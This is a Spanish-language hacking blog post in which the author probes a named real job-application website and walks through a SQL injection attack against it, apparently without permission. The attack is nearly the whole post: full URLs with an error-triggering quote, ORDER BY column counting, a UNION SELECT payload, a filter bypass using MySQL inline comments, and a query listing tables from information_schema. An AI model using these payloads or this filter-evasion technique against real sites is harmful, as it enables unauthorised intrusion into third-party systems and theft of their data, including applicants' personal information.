7:24
Anónimo
En este caso lo que me llama la atención como estas empresas contratan servicios de desarrollo web sin hacer ningún tipo de test de calidad mucho menos en seguridad de lo que contratan y por lo que pagan.
Esta web la mire en algunos diarios del país para subir el currículo y poder ser candidato a empleo en alguna de las empresas que se muestran ahí.
Pero esta vez ingrese porque vi que lo recomiendan en un sitio de una universidad, y dije...echare un vistazo un rato nomas jejeje.
A ingresar en www.signupgetajob.com lo que verán sera lo siguiente
Dentro de "Current Job Openings" hay 3 opciones y lo que me llamo la atención fue el link que tienen (Encerrados en verde en la imagen)
algo asi: http://infosistemas.hn3.net/signup/jobs.php?cod=10
Al dar click en el, abre el contenido en un iframe, entonces mejor lo abrimos en una perstaña nueva.
Y si seguimos con ese mismo link y le agregamos el comodin magico, obtendremos nuestro aclamado error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
http://infosistemas.hn3.net/signup/jobs.php?cod=10'
Ok, desde ya estamos seguros que tiene iSQL, pero con que nos toparemos despues, no lo sabemos, solo hay una manera de averiguarlo! asi que manos a la obra.
Entonces comenzamos a buscar la cantidad de columnas asi:
http://infosistemas.hn3.net/signup/jobs.php?cod=10%20ORDER%20BY%208--
Si colocamos 9 en lugar de 8 salta el error así que el numero que buscamos es 8.
Seguimos, y preparamos el SELECT asi:
http://infosistemas.hn3.net/signup/jobs.php?cod=10%20UNION%20SELECT%201,2,3,4,5,6,7,8--
Pero, Oh Rayos!!, estos individuos tienen filtro para iSql!!!! nooooo!!!, pues no salta el siguiente error.
Forbidden
You don't have permission to access /signup/jobs.php on this server.Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Y hasta aqui llega el articulo pensaran ustedes.... Pues no, no nos daremos por vencidos tan facilmente! sudemos un poco! jajaja
Tratemos un bypass a ese filtro:
El Select que inyectamos anterior mente es este:
http://infosistemas.hn3.net/signup/jobs.php?cod=10 UNION SELECT 1,2,3,4,5,6,7,8--
Ahora engañemos al filtro asi:
http://infosistemas.hn3.net/signup/jobs.php?cod=10+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,7,8--
y ahí obtenemos nuestros numeritos mágicos.
Con los cuales podemos sacar algo como esto:
http://infosistemas.hn3.net/signup/jobs.php?cod=10%20/*!UNION*/%20/*!SELECT*/%201,2,3,4,5,table_name,7,8+from+/*!information_schema*/.tables+LIMIT%2033,1--
Hasta la PROXYma.
Posted in:
hacks
0 comentarios :
Publicar un comentario